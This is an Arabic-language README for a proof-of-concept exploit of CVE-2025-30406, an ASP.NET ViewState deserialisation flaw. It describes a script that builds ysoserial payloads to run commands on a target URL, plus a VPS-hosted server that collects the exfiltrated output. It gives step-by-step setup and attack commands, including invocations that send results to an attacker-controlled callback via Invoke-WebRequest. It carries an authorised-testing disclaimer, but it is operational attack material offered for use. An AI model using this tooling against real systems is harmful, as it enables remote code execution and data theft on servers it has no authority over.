
CVE-2025-30406 استغلال ViewState إثبات المفهوم
هذا نص إثبات المفهوم (PoC) يوضح استغلال إلغاء تسلسل ViewState لثغرة CVE-2025-30406 في تطبيقات ASP.NET. يستخدم ysoserial لإنشاء حمولة ViewState ضارة وإرسالها إلى عنوان URL يحدده المستخدم لتنفيذ أمر معين. للحصول على أفضل النتائج، يمكن تسريب مخرجات الأمر إلى خادم HTTP مخصص (server.py) يعمل على VPS، والذي يعرض النتائج بتنسيق منمق مع طوابع زمنية ومحفزات خضراء ونص إخراج أبيض. هذا النص مخصص لأغراض تعليمية فقط ويجب استخدامه فقط على الأنظمة التي لديك تصريح صريح لإجراء اختبار أمني عليها. الاستخدام غير المصرح به غير قانوني وغير أخلاقي.
exploit.py: النص الرئيسي لإثبات المفهوم (PoC) لإنشاء وإرسال حمولة ViewState.server.py: خادم HTTP لاستقبال وعرض مخرجات الأوامر المسربة بتنسيق منمق.README.md: هذا الملف، مع تعليمات الإعداد والاستخدام.requests (pip install requests)server.py (موصى به للتسريب)git clone https://github.com/yourusername/cve-2025-30406-poc.git
cd cve-2025-30406-poc
pip install requests
exploit.py أو تحديد مساره:
لاستقبال مخرجات الأوامر المسربة بتنسيق منمق، قم بتشغيل server.py على VPS:
server.py إلى VPS الخاص بك (مثلاً عبر scp):
scp server.py user@your-vps-ip:/home/user/
sudo apt update && sudo apt install python3 python3-pip
python3 server.py
sudo ufw allow 8000
http://your-vps-ip:8000) لاستخدامه مع العلم -e في exploit.py.قم بتشغيل exploit.py مع الوسائط المطلوبة. العلم -e اختياري ولكنه موصى به بشدة لتسريب مخرجات الأوامر إلى server.py لعرضها بتنسيق منمق.
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
-u, --url: عنوان URL المستهدف (مثلاً http://target.com/page.aspx) [مطلوب]-c, --command: الأمر المراد تنفيذه (مثلاً whoami) [مطلوب]-y, --ysoserial: مسار ملف ysoserial القابل للتنفيذ (الافتراضي: ./ysoserial.exe) [اختياري]-e, --exfil: عنوان URL للاتصال العكسي لتسريب مخرجات الأمر (مثلاً http://your-vps:8000) [اختياري]python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
server.py (موصى به):
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
على VPS الخاص بك أو جهازك المحلي، ابدأ تشغيل خادم HTTP لاستقبال المخرجات المسربة:
python3 server.py
سيعرض الخادم مخرجات الأمر مع طوابع زمنية، ومحفز $ أخضر، ونص أبيض لسهولة القراءة.
exploit.py):
-e، يتم تغليف الأمر لالتقاط المخرجات وإرسالها إلى عنوان URL للاتصال العكسي عبر Invoke-WebRequest.__VIEWSTATE.server.py):
$ أخضر، ونص إخراج أبيض.-e.هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للحصول على التفاصيل.
للأسئلة أو الملاحظات، يرجى فتح مشكلة (issue) في هذا المستودع.